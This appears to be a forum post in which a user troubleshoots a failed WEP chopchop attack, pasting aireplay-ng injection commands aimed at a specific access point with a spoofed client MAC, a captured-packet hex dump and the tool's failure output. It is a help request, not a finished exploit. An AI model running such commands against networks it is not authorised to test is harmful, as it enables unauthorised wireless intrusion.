So, continuing my research I'm facing new problems again and again questions questions...
I've managed to stumble on some spanish video (why not japaneese... what will they think of next) - [Video] Chopchop without clients using IPW2200, link http://mirror-wifislax.lost-away.org...opchopipw2.htm
So I've used that walkthrough until this moment:
and then I get:
aireplay-ng --ipwsys -4 -a 00:1D:7E:BC:FA:D2 -h 6c:59:28:42:36:44 -i rtap0 eth1
I don't understand, if it worked for the spanish guy where is it gone now? So anyway, I just deleted that "--ipwsys" and try to run without it. Then I get:
aireplay-ng: unrecognized option `--ipwsys'
None of the "Possible reasons" are really possible in my case. Surfing google gave no serious result on this, also searching this forum I found only couple threads with very similar problems with dead-ends. And one more naive question: what a hell is rtap0? Is it some simulated/emulated adapter? In that case what for is it needed?
bt ~ # aireplay-ng -4 -a 00:1D:7E:BC:FA:D2 -h 00:16:6F:63:31:80 -i rtap0 eth1
Read 621 packets...
Size: 344, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1D:7E:BC:FA:D2
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:1D:7E:BC:FA:D0
0x0000: 0862 0000 0100 5e7f fffa 001d 7ebc fad2 .b....^....~...
0x0010: 001d 7ebc fad0 c01a bcd9 2500 496f c23a ..~.......%.Io.:
0x0020: 8b84 a376 9fad df60 bf31 fd45 bd71 1f3d ...v...`.1.E.q.=
0x0030: 5aac 82b5 15d0 c03d 8c8e ebd1 ffb4 e28a Z......=........
0x0040: c446 56ed 37a8 e796 07af ae84 6788 1bb0 .FV.7.......g...
0x0050: b179 34b7 4a29 8f1a c81a df41 436b 2386 .y4.J).....ACk#.
0x0060: ef41 0f7c ea1d c95b 6025 7350 b6ec 0b4b .A.|...[`%sP...K
0x0070: 5920 d7cf 4cd4 13c5 f160 ba50 0069 e971 Y ..L....`.P.i.q
0x0080: e6c5 270a 7d6c 663f d9af dcca 464c 9374 ..'.}lf?....FL.t
0x0090: 61d9 8100 ba17 2ac8 a7d1 8e9e 4abd 3d01 a.....*.....J.=.
0x00a0: 982b e5da 597c c4d5 19b7 ce02 e1a4 1018 .+..Y|..........
0x00b0: 7129 77a2 62de 7444 b326 4146 a3c7 ae98 q)w.b.tD.&AF....
0x00c0: b746 418b 631e 35d5 0f74 e3d7 74e5 ac33 .FA.c.5..t..t..3
0x00d0: 9fe6 cd37 fec4 684d ceb6 dd8c d96f 27f2 ...7..hM.....o'.
--- CUT ---
Use this packet ? y
Saving chosen packet in replay_src-0803-212715.cap
Sent 434 packets, current guess: B0...
The chopchop attack appears to have failed. Possible reasons:
* You're trying to inject with an unsupported chipset (Centrino?).
* The driver source wasn't properly patched for injection support.
* You are too far from the AP. Get closer or reduce the send rate.
* Target is 802.11g only but you are using a Prism2 or RTL8180.
* The wireless interface isn't setup on the correct channel.
* The client MAC you have specified is not currently authenticated.
Try running another aireplay-ng to fake authentication (attack "-1").
* The AP isn't vulnerable when operating in authenticated mode.
Try aireplay-ng in non-authenticated mode instead (no -h option).